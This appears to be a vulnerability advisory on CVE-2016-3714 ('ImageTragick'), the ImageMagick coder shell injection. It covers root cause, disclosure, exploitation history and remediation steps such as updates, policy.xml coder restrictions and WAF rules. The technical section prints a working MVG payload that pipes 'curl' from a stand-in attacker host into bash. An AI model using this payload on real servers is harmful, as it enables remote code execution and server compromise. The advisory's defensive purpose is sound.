CVE-2016-3714

What Is ImageMagick?

ImageMagick is a ubiquitous open-source image processing suite used by virtually every web application that accepts user-uploaded images. Ruby on Rails, PHP applications, WordPress, Drupal, and thousands of custom web platforms call ImageMagick (directly or via language bindings like RMagick, MiniMagick, Imagick, and Wand) to resize, convert, watermark, and process uploaded images. Because ImageMagick processes arbitrary user-supplied image files on the server side, any remote code execution vulnerability in ImageMagick is simultaneously a vulnerability in every web application using it — making it a platform-level vulnerability affecting a massive fraction of the internet.

ImageMagick supports hundreds of image formats through "coders" — format-specific processing modules. Several of these coders interpret special URL schemes or embedded commands, creating shell injection opportunities when user input is not sanitized before being passed to ImageMagick.

Overview

CVE-2016-3714, known as "ImageTragick", is a shell injection vulnerability in ImageMagick's image processing pipeline that allows remote code execution on any server processing user-supplied images with ImageMagick. When ImageMagick processes an image file whose URL or embedded content contains shell metacharacters, those characters are passed unsanitized to shell commands executed by certain ImageMagick coders (EPHEMERAL, HTTPS, MVG, MSL, TEXT, SHOW, WIN, PLT). Since ImageMagick is called by web applications to process uploaded images, an attacker can upload a crafted image file that causes the server to execute arbitrary OS commands. Disclosed May 4, 2016 with immediate mass exploitation. CISA added CVE-2016-3714 to the KEV catalog in September 2024.

Affected Versions

Note: Applications using ImageMagick through language bindings (Ruby RMagick/MiniMagick, PHP Imagick, Python Wand, Node.js imagemagick) are vulnerable through those bindings.

Technical Details

Root Cause: Shell Injection via Unvalidated Coder URLs

CVE-2016-3714 is an input validation failure (CWE-20) in ImageMagick's handling of image format identifiers and embedded URLs. Several ImageMagick coders process URLs or filenames by constructing shell commands that include user-supplied input without sanitization:

HTTPS coder example — when ImageMagick is asked to fetch and process an image from a URL, the URL is passed to wget or curl via a shell command. A crafted image file containing:

push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|curl http://attacker.com/shell.sh|bash")'
pop graphic-context

causes ImageMagick to execute: wget "https://example.com/image.jpg"|curl http://attacker.com/shell.sh|bash" — injecting arbitrary commands.

MVG/MSL coders — ImageMagick's vector graphics (MVG) and Magick Scripting Language (MSL) coders process embedded commands that can reference external resources or execute operations, providing additional injection vectors.

Attack via uploaded image — because web applications pass user-uploaded files directly to ImageMagick, an attacker simply uploads a crafted .png, .jpg, or .gif file (with appropriate magic bytes to pass extension-based checks) containing the MVG/URL injection payload. ImageMagick processes the file, executes the injected commands as the web server process user, and returns results (or simply executes a reverse shell or downloads a backdoor).

The "ImageTragick" Disclosure

The vulnerability was named "ImageTragick" by the disclosure team (Nikolay Ermishkin of Mail.Ru Security Team and Stewie) and published at imagetragick.com with working proof-of-concept exploit code on May 4, 2016. The disclosure caused immediate mass exploitation — within hours of the public announcement, exploitation attempts were observed globally. Cloudflare deployed WAF rules within 24 hours; major CDN providers and WAF vendors followed.

Companion CVEs

CVE-2016-3714 was disclosed alongside four related ImageMagick vulnerabilities affecting the same coders:

Attack Characteristics

Discovery

Discovered by Nikolay Ermishkin (Mail.Ru Security Team) and researcher "Stewie." Coordinated disclosure was initiated with the ImageMagick developers but the disclosure window was short — the developers released a policy.xml-based mitigation on May 3, 2016, and public disclosure followed May 4, 2016. The short window resulted in widespread unpatched exposure at disclosure time.

Exploitation Context

• Universal web application impact: The combination of ImageMagick's near-universal deployment in web applications and the simplicity of exploitation (upload a crafted image) made ImageTragick one of the most broadly impactful web vulnerabilities of 2016; virtually any web application with an image upload feature was potentially vulnerable
• Immediate mass exploitation: Unlike many vulnerabilities with a gap between disclosure and weaponization, CVE-2016-3714 was exploited at scale within hours of disclosure; exploitation attempts were measured in the millions within days
• Web shell deployment: The most common observed payloads were web shell downloads (PHP/Python reverse shells), enabling persistent access to compromised servers
• Long tail of unpatched applications: Many web applications that include ImageMagick as a dependency were slow to apply updates — particularly WordPress/PHP deployments on shared hosting; CISA's September 2024 KEV addition reflects continued exploitation eight years after the original disclosure
• WAF rule availability: WAF rules blocking ImageTragick payloads are available from all major WAF vendors (Cloudflare, AWS WAF, ModSecurity); these provide immediate mitigation for applications that cannot be immediately updated

Remediation

1. Update ImageMagick to 6.9.4+ or 7.0.2+ — these versions include the complete fix for CVE-2016-3714. Apply via package manager (apt upgrade imagemagick, yum update imagemagick) or compile from source. Verify the installed version with convert --version.

2. Apply policy.xml restrictions immediately — if upgrade is not immediately possible, add a policy.xml configuration to disable dangerous coders. Add to ImageMagick's policy.xml:

   <policy domain="coder" rights="none" pattern="EPHEMERAL" />
   <policy domain="coder" rights="none" pattern="HTTPS" />
   <policy domain="coder" rights="none" pattern="MVG" />
   <policy domain="coder" rights="none" pattern="MSL" />
   <policy domain="coder" rights="none" pattern="URL" />
   <policy domain="coder" rights="none" pattern="HTTP" />
   

3. Validate file content, not extension — applications should verify that uploaded files match the expected format using magic byte checks (not filename extension alone) before passing them to ImageMagick.

4. Deploy WAF rules — enable ImageTragick-specific WAF rules (available in Cloudflare WAF, AWS WAF Managed Rules, ModSecurity CRS) to block exploitation attempts at the network edge.

5. Run ImageMagick in isolation — process images in a sandboxed environment (Docker container, seccomp profile, or AppArmor/SELinux confinement) that restricts the shell access available if exploitation occurs.